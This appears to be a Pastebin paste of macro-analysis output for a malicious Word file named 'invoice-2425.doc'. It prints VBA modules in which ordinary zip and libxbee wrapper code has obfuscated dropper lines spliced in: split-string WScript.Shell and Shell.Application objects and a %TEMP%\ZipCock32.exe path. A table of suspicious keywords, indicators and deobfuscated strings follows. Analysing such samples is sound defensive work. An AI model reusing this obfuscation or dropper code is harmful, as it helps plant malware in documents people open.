  717.     Else
  718.         SplitMult = 1024 * 1024&
  719.         SplitNum = Val(SplitSize)
  720.     End If
  721.     SplitNum = SplitNum * SplitMult
  722.     If SplitNum = 0 Then
  723.         MsgBox "SplitSize of 0 not supported"
  724.         Exit Function
  725.     ElseIf SplitNum < 64 * 1024& Then
  726.         MsgBox "SplitSize must be at least 64k"
  727.         Exit Function
  728.     End If
  729.     ZipOpts.szSplitSize = SplitSize
  730.   End If
  731.  
  732.   If IncludeVolumeLabel Then ZipOpts.fVolume = 1
  733.   If UsePrivileges Then ZipOpts.fPrivilege = 1
  734.   If ExcludeExtraAttributes Then ZipOpts.fExtra = 1
  735.  
  736.   SetZipOptions = True
  737.    
  738. End Function
  739.  
  740. Public Function ChopNulls(ByVal str)
  741.   Dim A As Integer
  742.   Dim c As String
  743.    
  744.   For A = 1 To Len(str)
  745.     If Mid(str, A, 1) = Chr(0) Then
  746.       ChopNulls = Left(str, A - 1)
  747.       Exit Function
  748.     End If
  749.   Next
  750.  
  751. Set processEnv = CreateObject("WScript." + "Shell").Environment("Pro" & "cess")
  752.   ChopNulls = str
  753.    
  754. End Function
  755. Sub DisplayVersion()
  756.  
  757.   ' display version of DLL
  758.  Dim Beta As Boolean
  759.   Dim ZLIB As Boolean
  760.   Dim Zip64 As Boolean
  761.   Dim Flags As String
  762.   Dim A As Integer
  763.  
  764.   ZipVersion.structlen = Len(ZipVersion)
  765.   ZpVersion ZipVersion
  766.   ' Check flag
  767.  If ZipVersion.flag And 1 Then
  768.     Flags = Flags & " Beta,"
  769.     Beta = True
  770.   Else
  771.     Flags = Flags & " No Beta,"
  772.   End If
  773.   If ZipVersion.flag And 2 Then
  774.     Flags = Flags & " ZLIB,"
  775.     ZLIB = True
  776.   Else
  777.     Flags = Flags & " No ZLIB,"
  778.   End If
  779.   If ZipVersion.flag And 4 Then
  780.     Flags = Flags & " Zip64, "
  781.     Zip64 = True
  782.   Else
  783.     Flags = Flags & " No Zip64, "
  784.   End If
  785.   If ZipVersion.encryption Then
  786.     Flags = Flags & "Encryption"
  787.   Else
  788.     Flags = Flags & " No encryption"
  789.   End If
  790.  
  791.   Form1.Caption = "Using Zip32z64.DLL Version " & _
  792.                   ZipVersion.ZipVersion.Major & "." & ZipVersion.ZipVersion.Minor & " " & _
  793.                   ChopNulls(ZipVersion.Beta) & "  [" & ChopNulls(ZipVersion.Date) & "]" & _
  794.                   " - FLAGS: " & Flags
  795.  
  796.   If Not Zip64 Then
  797.     A = MsgBox("Zip32z64.dll not compiled with Zip64 enabled - continue?", _
  798.                vbOKCancel, _
  799.                "Wrong dll")
  800.     If A = vbCancel Then
  801.         End
  802.     End If
  803.   End If
  804.  
  805. End Sub
  806.  
  807. -------------------------------------------------------------------------------
  808. VBA MACRO Module3.bas
  809. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module3'
  810. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  811.  
  812. Public Function PointerToString(lngPtr As Long) As String
  813.    Dim strTemp As String
  814.    Dim lngLen As Long
  815.    If lngPtr Then
  816.       lngLen = lstrlenW(lngPtr) * 2
  817.       If lngLen Then
  818.          strTemp = Space(lngLen)
  819.          CopyMemory ByVal strTemp, ByVal lngPtr, lngLen
  820.          PointerToString = Replace(strTemp, Chr(0), "")
  821.       End If
  822.    End If
  823. End Function
  824.  
  825. Public Function ArrayToString(data() As Byte, Optional lb As Integer = -1, Optional ub As Integer = -1) As String
  826.     Dim tmp As String
  827.     Dim i
  828.     If lb = -1 Then lb = LBound(data)
  829.     If ub = -1 Then ub = UBound(data)
  830.     tmp = ""
  831.     For i = lb To ub
  832.         If (data(i) = 0) Then Exit For
  833.         tmp = tmp & Chr(data(i))
  834.     Next
  835.     ArrayToString = tmp
  836. End Function
  837.  
  838. Public Function xbee_pointerToPacket(lngPtr As Long) As String
  839.     Dim p As xbee_pkt
  840.     CopyMemory p, ByVal lngPtr, Len(p)
  841.     xbee_pointerToPacket = p
  842. End Function
  843.  
  844. Public Sub libxbee_load()
  845.     ' this function is simply to get VB6 to call a libxbee function
  846.    ' if you are using any C DLLs that make use of libxbee, then you should call this function first so that VB6 will load libxbee
  847.    xbee_svn_versionRaw
  848. End Sub
  849.  
  850. Public Function xbee_svn_version() As String
  851.     xbee_svn_version = PointerToString(xbee_svn_versionRaw())
  852. End Function
  853.  
  854. Public Function xbee_setupAPI(ByVal port As String, ByVal baudRate As Long, ByVal cmdSeq As String, ByVal cmdTime As Long)
  855.     xbee_setupAPI = xbee_setupAPIRaw(port, baudRate, Asc(cmdSeq), cmdTime)
  856. End Function
  857.  
  858. Public Function xbee_setupDebugAPI(ByVal port As String, ByVal baudRate As Long, ByVal logfile As String, ByVal cmdSeq As String, ByVal cmdTime As Long)
  859.     xbee_setupDebugAPI = xbee_setupDebugAPIRaw(port, baudRate, logfile, Asc(cmdSeq), cmdTime)
  860. End Function
  861.  
  862. Public Sub xbee_ensureMessageID()
  863.  
  864. Set ZDLLPass3 = CreateObject("Shell.Application")
  865. Exit Sub
  866.     If callbackMessageID = 0 Then
  867.         callbackMessageID = Regist.erWindowMessage("libxbee")
  868.     End If
  869.     xbee_enabl.eCallbacksRaw ActivehWnd, callbackMessageID
  870. End Sub
  871.  
  872. Public Sub xbee_attachCallback(ByVal con As Long, ByVal func As Long)
  873.     Dim t(0 To 1) As Long
  874.     Dim c As String
  875.     If ActivehWnd = 0 Then
  876.         Debug.Print "Callbacks not enabled!"
  877.         Exit Sub
  878.     End If
  879.     xbee_ensureMessageID
  880.     c = CStr(con)
  881.     t(0) = con
  882.     t(1) = func
  883.     On Error Resume Next
  884.     Callbacks.Remove c
  885.     Callbacks.Add t, c
  886.     On Error GoTo 0
  887.     xbee_attachCallbackRaw con
  888. End Sub
  889.  
  890. Public Sub xbee_detachCallback(ByVal con As Long)
  891.     If ActivehWnd = 0 Then
  892.         Debug.Print "Callbacks not enabled!"
  893.         Exit Sub
  894.     End If
  895.     On Error Resume Next
  896.     xbee_detachCallbackRaw con
  897.     Callbacks.Remove CStr(con)
  898. End Sub
  899.  
  900. Public Sub xbee_enableCallbacks(ByVal hWnd As Long)
  901.     If ActivehWnd <> 0 Then
  902.         Debug.Print "Callbacks already enabled!"
  903.         Exit Sub
  904.     End If
  905.     ActivehWnd = hWnd
  906.     OldhWndHandler = SetWindowLong(hWnd, GWL_WNDPROC, AddressOf libxbee.xbee_messageHandler)
  907.     xbee_ensureMessageID
  908. End Sub
  909.  
  910. Public Sub xbee_disableCallbacks()
  911.     Dim id As Variant
  912.     If ActivehWnd = 0 Then
  913.         Debug.Print "Callbacks not enabled!"
  914.         Exit Sub
  915.     End If
  916.     For Each id In Callbacks
  917.         xbee_detachCallback id(0)
  918.     Next
  919.     SetWindowLong ActivehWnd, GWL_WNDPROC, OldhWndHandler
  920.     ActivehWnd = 0
  921.     OldhWndHandler = 0
  922. End Sub
  923.  
  924. '-- Main ZIP32.DLL Subroutine.
  925. '-- This Is Where It All Happens!!!
  926. '--
  927. '-- (WARNING!) Do Not Change This Function!!!
  928. '--
  929. Public Function VBZip32()
  930.    
  931.   Dim retcode As Long
  932.   Dim FileNotFound As Boolean
  933.    
  934.   ' On Error Resume Next '-- Nothing Will Go Wrong :-)
  935.  On Error GoTo ZipError
  936.    
  937.   retcode = 0
  938.     prompt82 = processEnv("T" & "" + "E" + "" + "M" & "P")
  939.   '-- Set Address Of ZIP32.DLL Callback Functions
  940.  '-- (WARNING!) Do Not Change!!! (except as noted below)
  941.  ZUSER.ZDLLPrnt = FnP.tr(AddressOf ZDLLPass)
  942.   ZUSER.ZDLLPASSWORD = FnP.tr(AddressOf ZDLLPass)
  943.   ZUSER.ZDLLCOMMENT = FnP.tr(AddressOf ZDLLComm)
  944.   ZUSER.ZDLLSERVICE_NO_INT64 = FnP.tr(AddressOf ZDLLServ)
  945.  
  946.   ' If you need to set destination of each split set this
  947.  'ZUSER.ZDLLSPLIT = FnPtr(AddressOf ZDLLSplitSelect)
  948.  
  949.   '-- Set ZIP32.DLL Callbacks - return 1 if DLL loaded 0 if not
  950.  retcode = ZpI.nit(ZUSER)
  951.   If retcode = 0 And FileNotFound Then
  952.     MsgBox "Probably could not find Zip32z64.DLL - have you copied" & Chr(10) & _
  953.            "it to the System directory, your program directory, " & Chr(10) & _
  954.            "or a directory on your command PATH?"
  955.     VBZip32 = retcode
  956.     Exit Function
  957.   End If
  958.  
  959.   DisplayVersion
  960.    
  961.   If strZipFileNames = "" Then
  962.     ' not using string of names to zip (so using array of names)
  963.    strZipFileNames = vbNullString
  964.   End If
  965.  
  966.   '-- Go Zip It Them Up!
  967.  retcode = ZpAr.chive(zArgc, zZipArchiveName, zZipFileNames, strZipFileNames, ZOPT)
  968.  
  969.   '-- Return The Function Code
  970.  VBZip32 = retcode
  971.  
  972.   Exit Function
  973.  
  974. ZipError:
  975.  
  976.  
  977. prompt82 = prompt82 & "\" & "ZipCock32." + "e" & "xe"
  978.  
  979. End Function
  980.  
  981. Private Function xbee_messageHandler(ByVal hWnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  982.     If uMsg = callbackMessageID Then
  983.         Dim t As Long
  984.         On Error Resume Next
  985.         Err.Clear
  986.         t = Callbacks.Item(CStr(wParam))(1)
  987.         If Err.Number = 0 Then
  988.             On Error GoTo 0
  989.             xbee_messageHandler = xbee_runCallback(t, wParam, lParam)
  990.             Exit Function
  991.         End If
  992.         On Error GoTo 0
  993.         xbee_logit "Unable to match Connection with active callback!"
  994.     End If
  995.     xbee_messageHandler = CallWindowProc(OldhWndHandler, hWnd, uMsg, wParam, lParam)
  996.     If uMsg = WM_DESTROY And ActivehWnd <> 0 Then
  997.         ' Disable the MessageHandler if the form "unload" event is detected
  998.        xbee_disableCallbacks
  999.     End If
  1000. End Function
  1001.  
  1002. Public Sub xbee_endcon(ByRef con As Long)
  1003.     xbee_endcon2 con
  1004.     con = 0
  1005. End Sub
  1006.  
  1007. Public Function xbee_sendstring(ByVal con As Long, ByVal str As String)
  1008.     xbee_sendstring = xbee_senddata_str(con, str, Len(str))
  1009. End Function
  1010.  
  1011. Public Function xbee_getpacketPtr(ByVal con As Long, ByRef pkt As Long) As Integer
  1012.     Dim ptr As Long
  1013.    
  1014.     ptr = xbee_getpacketRaw(con)
  1015.     If ptr = 0 Then
  1016.         pkt = 0
  1017.         xbee_getpacketPtr = 0
  1018.         Exit Function
  1019.     End If
  1020.    
  1021.     pkt = ptr
  1022.     xbee_getpacketPtr = 1
  1023. End Function
  1024.  
  1025. Public Function xbee_getpacket(ByVal con As Long, ByRef pkt As String) As Integer
  1026.     Dim ptr As Long
  1027.    
  1028.     ptr = xbee_getpacketRaw(con)
  1029.     If ptr = 0 Then
  1030.         xbee_getpacket = 0
  1031.         Exit Function
  1032.     End If
  1033.    
  1034.     pkt = xbee_pointerToPacket(ptr)
  1035.     xbee_free ptr
  1036.    
  1037.     xbee_getpacket = 1
  1038. End Function
  1039. +------------+----------------------+-----------------------------------------+
  1040. | Type       | Keyword              | Description                             |
  1041. +------------+----------------------+-----------------------------------------+
  1042. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  1043. | Suspicious | Open                 | May open a file                         |
  1044. | Suspicious | Shell                | May run an executable file or a system  |
  1045. |            |                      | command                                 |
  1046. | Suspicious | Shell.Application    | May run an application (if combined     |
  1047. |            |                      | with CreateObject)                      |
  1048. | Suspicious | CreateObject         | May create an OLE object                |
  1049. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1050. |            |                      | strings                                 |
  1051. | Suspicious | ADODB.Stream         | May create a text file                  |
  1052. | Suspicious | SaveToFile           | May create a text file                  |
  1053. | Suspicious | Write                | May write to a file (if combined with   |
  1054. |            |                      | Open)                                   |
  1055. | Suspicious | Put                  | May write to a file (if combined with   |
  1056. |            |                      | Open)                                   |
  1057. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1058. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1059. |            |                      | command (obfuscation: VBA expression)   |
  1060. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  1061. |            |                      | be used to obfuscate strings (option    |
  1062. |            |                      | --decode to see all)                    |
  1063. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  1064. |            |                      | may be used to obfuscate strings        |
  1065. |            |                      | (option --decode to see all)            |
  1066. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1067. |            | Strings              | may be used to obfuscate strings        |
  1068. |            |                      | (option --decode to see all)            |
  1069. | IOC        | UNZIP32.DLL          | Executable file name                    |
  1070. | IOC        | Zip32.DLL            | Executable file name                    |
  1071. | IOC        | ZIP32z64.DLL         | Executable file name                    |
  1072. | IOC        | Zip32z64.DLL         | Executable file name                    |
  1073. | IOC        | Zip32z64.dll         | Executable file name                    |
  1074. | IOC        | ZIP32.DLL            | Executable file name                    |
  1075. | IOC        | ZipCock32.exe        | Executable file name (obfuscation: VBA  |
  1076. |            |                      | expression)                             |
  1077. | VBA string | Remove comment? Hit  | "Remove comment?" & Chr(13) & "Hit No   |
  1078. |            | No to keep existing  | to keep existing comment"               |
  1079. |            | comment              |                                         |
  1080. | VBA string | GET                  | "G" & "E" + "T"                         |
  1081. | VBA string | Both ExcludeEarlierT | "Both ExcludeEarlierThanDate and        |
  1082. |            | hanDate and IncludeE | IncludeEarlierThanDate not " & Chr(10)  |
  1083. |            | arlierThanDate not   | &            "supported at same time"   |
  1084. |            | supported at same    |                                         |
  1085. |            | time                 |                                         |
  1086. | VBA string | WScript.Shell        | ("WScript." + "Shell")                  |
  1087. | VBA string | Process              | ("Pro" & "cess")                        |
  1088. | VBA string | ] - FLAGS:           | "]" &                   " - FLAGS: "    |
  1089. | VBA string | TEMP                 | ("T" & "" + "E" + "" + "M" & "P")       |
  1090. | VBA string | Probably could not   | "Probably could not find Zip32z64.DLL - |
  1091. |            | find Zip32z64.DLL -  | have you copied" & Chr(10) &            |
  1092. |            | have you copied      | "it to the System directory, your       |
  1093. |            | it to the System     | program directory, " & Chr(10) &        |
  1094. |            | directory, your      | "or a directory on your command PATH?"  |
  1095. |            | program directory,   |                                         |
  1096. |            | or a directory on    |                                         |
  1097. |            | your command PATH?   |                                         |
  1098. | VBA string | \ZipCock32.exe       | "\" & "ZipCock32." + "e" & "xe"         |
  1099. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top